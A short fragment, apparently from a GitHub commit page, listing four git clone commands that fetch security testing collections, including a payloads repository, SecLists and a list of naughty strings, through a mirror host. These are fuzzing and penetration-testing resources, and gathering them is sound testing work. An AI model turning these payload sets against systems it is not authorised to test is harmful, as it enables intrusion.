git clone https://github.com/minimaxir/big-list-of-naughty-strings.git
git clone https://github.com/foospidy/payloads.git
git clone https://github.com/danielmiessler/RobotsDisallowed.git
git clone https://github.com/danielmiessler/SecLists.git

0 comments on commit ec37930

Please sign in to comment.